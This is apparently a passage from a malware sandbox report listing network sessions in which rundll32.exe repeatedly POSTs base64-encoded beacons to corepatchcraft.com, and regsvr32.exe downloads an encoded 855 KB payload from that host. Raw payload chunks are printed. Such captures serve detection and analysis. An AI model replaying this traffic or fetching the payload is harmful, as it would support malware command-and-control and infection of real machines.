                        2025-01-16 05:03:53 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:53 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:53 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:53 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        87192.168.2.66446694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:54 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:54 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:54 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:54 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:54 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        88192.168.2.66446794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:55 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:55 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:56 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:56 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:56 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        89192.168.2.66446894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:57 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:57 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:57 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:57 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:57 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        90192.168.2.66446994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:58 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:58 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:58 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:58 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:58 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        91192.168.2.66447094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:59 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:59 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:04:00 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:00 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:00 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        92192.168.2.66447194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:04:01 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:04:01 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:04:01 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:01 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:01 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        93192.168.2.66447394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:04:02 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:04:02 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:04:03 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:03 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        94192.168.2.66447494.159.113.2134435688C:\Windows\SysWOW64\regsvr32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:04:03 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:04:03 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close
                        2025-01-16 05:04:03 UTC7940INData Raw: 41 51 50 36 54 55 74 4f 63 55 78 64 61 6b 31 49 73 59 35 4d 57 64 4a 4e 53 45 35 78 54 46 6c 71 44 55 68 4f 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 53 45 35 78 54 46 6c 71 54 55 68 4f 0d 0a 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 57 45 39 78 54 46 64 31 39 30 5a 4f 78 55 57 55 53 2f 56 4a 41 72 78 74 44 51 49 6b 4f 32 34 42 50 6a 59 4e 50 79 6b 6a 55 53 38 34 42 43 4d 6e 0d 0a 4f 6c 45 75 50 45 6f 2f 50 53 42 52 4a 54 64 4b 43 51 63 64 55 53 45 32 44 69 68 6d 51 33 78 47 66 57 70 4e 53 45 35 78 54 46 6d 6a 68 65 78 48 2f 4f 57 54 4d 4d 44 68 68 43 76 42 38 4b 41 58 0d 0a 46 70 57 34 46 39 2f 44 68 78 49 51 71 6f 4d 43 52 75 53 43 46 50 70 6b 6c 7a 48 51 34 59 51 72 78 33 47 6a 46 74 44 6e 75 78 59 48 73 59 4d 54 31 64 69 47 41 2b 46 6c 68
                        Data Ascii: AQP6TUtOcUxdak1IsY5MWdJNSE5xTFlqDUhOcUxZak1ITnFMWWpNSE5xTFlqTUhOcUxZak1ITnFMWWpNWE9xTFd190ZOxUWUS/VJArxtDQIkO24BPjYNPykjUS84BCMnOlEuPEo/PSBRJTdKCQcdUSE2DihmQ3xGfWpNSE5xTFmjhexH/OWTMMDhhCvB8KAXFpW4F9/DhxIQqoMCRuSCFPpklzHQ4YQrx3GjFtDnuxYHsYMT1diGA+Flh
                        2025-01-16 05:04:03 UTC16384INData Raw: 7a 35 31 6d 78 67 57 79 6d 61 71 71 61 45 33 44 43 34 33 48 76 44 65 50 54 45 36 39 67 4a 57 6d 67 59 53 43 76 59 43 56 70 6f 47 45 0d 0a 47 2f 71 67 32 6f 5a 6c 77 51 4f 4e 66 35 6e 68 41 4c 54 48 63 4d 55 59 62 73 51 4a 52 76 6f 5a 70 61 30 50 54 45 39 78 54 46 6e 68 43 4c 53 4a 4d 55 52 59 61 6b 31 49 78 54 79 77 6e 6d 73 4a 0d 0a 4c 45 5a 68 78 77 78 6d 78 42 32 6d 2b 67 6c 52 34 77 69 73 78 54 79 77 32 71 74 42 77 51 4f 64 78 77 79 47 78 42 32 32 2b 67 6d 78 34 77 69 6f 78 54 79 6f 30 43 65 52 77 78 75 52 78 31 76 6a 0d 0a 43 4a 44 46 50 4a 44 53 65 38 51 64 75 76 6f 4a 6f 61 31 4e 4c 41 68 35 58 4e 49 6e 74 59 39 50 75 51 70 52 65 73 59 64 74 76 6f 4a 72 65 4d 50 54 4d 30 4d 75 46 6b 66 52 49 38 4c 67 55 78 5a 0d 0a 61 6b 32 6a 52 2f 6f 42 72 57 6b
                        Data Ascii: z51mxgWymaqqaE3DC43HvDePTE69gJWmgYSCvYCVpoGEG/qg2oZlwQONf5nhALTHcMUYbsQJRvoZpa0PTE9xTFnhCLSJMURYak1IxTywnmsJLEZhxwxmxB2m+glR4wisxTyw2qtBwQOdxwyGxB22+gmx4wioxTyo0CeRwxuRx1vjCJDFPJDSe8QduvoJoa1NLAh5XNIntY9PuQpResYdtvoJreMPTM0MuFkfRI8LgUxZak2jR/oBrWk
                        2025-01-16 05:04:03 UTC16384INData Raw: 70 6f 47 45 67 72 30 5a 30 6f 59 6e 74 79 59 52 72 56 35 36 4b 65 6c 4f 63 55 78 5a 0d 0a 4f 69 6e 42 61 33 46 4d 57 57 6f 63 79 36 4a 74 48 77 38 39 78 43 32 2b 2b 41 47 78 34 51 69 67 78 7a 53 51 30 69 65 52 77 51 4f 52 78 77 79 4b 78 6b 72 48 4e 4b 6a 53 4a 30 56 48 38 43 42 42 0d 0a 33 4c 68 43 7a 66 39 78 54 46 6e 68 43 45 44 4e 73 56 77 4a 34 51 43 67 70 6b 69 2f 70 70 58 45 44 61 4c 36 41 62 58 68 47 45 54 48 49 45 6a 53 4c 36 48 44 41 33 6e 47 43 47 62 46 47 45 4c 36 0d 0a 43 62 31 6c 38 77 42 44 39 49 55 74 62 4d 59 64 6f 76 67 5a 76 61 30 49 74 45 35 78 54 46 6e 68 43 4b 51 65 2b 67 46 52 34 56 77 61 78 54 79 6b 73 51 32 79 74 37 48 34 43 59 48 68 43 4b 54 46 0d 0a 50 4a 54 51 59 73 59 64 6f 69 50 48 48 47 4c 47 41 45 59 67 78 78 53 43 70 51 47
                        Data Ascii: poGEgr0Z0oYntyYRrV56KelOcUxZOinBa3FMWWocy6JtHw89xC2++AGx4QigxzSQ0ieRwQORxwyKxkrHNKjSJ0VH8CBB3LhCzf9xTFnhCEDNsVwJ4QCgpki/ppXEDaL6AbXhGETHIEjSL6HDA3nGCGbFGEL6Cb1l8wBD9IUtbMYdovgZva0ItE5xTFnhCKQe+gFR4VwaxTyksQ2yt7H4CYHhCKTFPJTQYsYdoiPHHGLGAEYgxxSCpQG
                        2025-01-16 05:04:04 UTC16384INData Raw: 74 37 46 43 6a 4a 69 4b 54 55 76 4c 0d 0a 76 62 4b 6d 6c 63 54 4e 68 6f 2b 7a 70 75 45 41 75 4d 63 38 2f 4e 4c 2f 68 62 61 78 6a 73 55 4d 78 73 59 4e 51 76 6f 42 53 65 50 49 61 4c 47 4f 73 39 44 6e 61 62 65 78 6a 71 64 4c 34 52 6a 34 0d 0a 7a 5a 74 4e 30 44 2f 39 77 77 76 64 7a 35 6c 72 78 41 33 69 38 6a 48 70 61 6a 74 6f 77 2f 78 73 70 70 57 79 77 63 4f 31 73 71 61 56 78 68 33 69 66 76 70 62 4f 73 62 46 69 6f 2b 7a 70 6f 4b 77 0d 0a 57 30 39 78 70 35 48 68 77 47 69 78 6a 72 50 53 2f 32 6d 33 73 59 37 46 31 44 4b 7a 74 37 48 34 32 51 57 55 73 72 66 46 39 42 53 6e 6c 62 4c 44 77 79 32 79 70 70 58 45 44 55 4c 34 41 55 6d 44 0d 0a 7a 55 70 4f 63 63 30 6b 77 6b 31 4a 54 6e 46 44 33 42 4a 4d 53 45 37 38 32 58 6d 55 73 72 66 48 4a 4f 6a 53 4c 2b 6e 42 79 7a 47
                        Data Ascii: t7FCjJiKTUvLvbKmlcTNho+zpuEAuMc8/NL/hbaxjsUMxsYNQvoBSePIaLGOs9DnabexjqdL4Rj4zZtN0D/9wwvdz5lrxA3i8jHpajtow/xsppWywcO1sqaVxh3ifvpbOsbFio+zpoKwW09xp5HhwGixjrPS/2m3sY7F1DKzt7H42QWUsrfF9BSnlbLDwy2yppXEDUL4AUmDzUpOcc0kwk1JTnFD3BJMSE782XmUsrfHJOjSL+nByzG
                        2025-01-16 05:04:04 UTC16384INData Raw: 31 47 2b 42 6d 4a 34 51 6a 38 78 7a 53 59 30 69 65 5a 77 51 4f 35 78 77 79 36 78 42 32 43 2b 67 6d 56 4f 73 59 46 68 70 6d 77 38 47 70 4e 49 6b 37 38 41 65 6b 37 70 55 6e 45 6a 72 50 61 0d 0a 72 6b 56 48 2b 4b 48 4a 69 78 39 61 49 46 68 4e 54 46 6b 43 6e 51 35 47 59 53 52 42 4e 30 56 59 70 69 46 50 58 32 72 4f 6a 45 4b 32 43 5a 31 71 54 55 68 4f 2f 41 48 74 34 77 43 67 78 53 53 6b 0d 0a 30 6d 6a 45 44 59 37 36 41 62 48 68 47 49 7a 48 59 4d 63 63 71 73 51 4e 38 76 6f 42 35 65 4d 41 38 49 6b 30 73 4b 61 56 73 72 66 44 50 50 79 78 63 70 46 49 54 76 6f 4a 34 65 45 41 76 43 72 34 0d 0a 51 56 6c 71 54 55 6a 46 6c 42 47 61 70 6f 47 45 67 72 32 41 6c 54 2f 47 70 4d 32 64 43 4e 51 76 73 73 45 4c 67 53 5a 59 35 77 43 33 48 35 6d 46 4f 47 68 4e 79 34 70 35 78 52 79
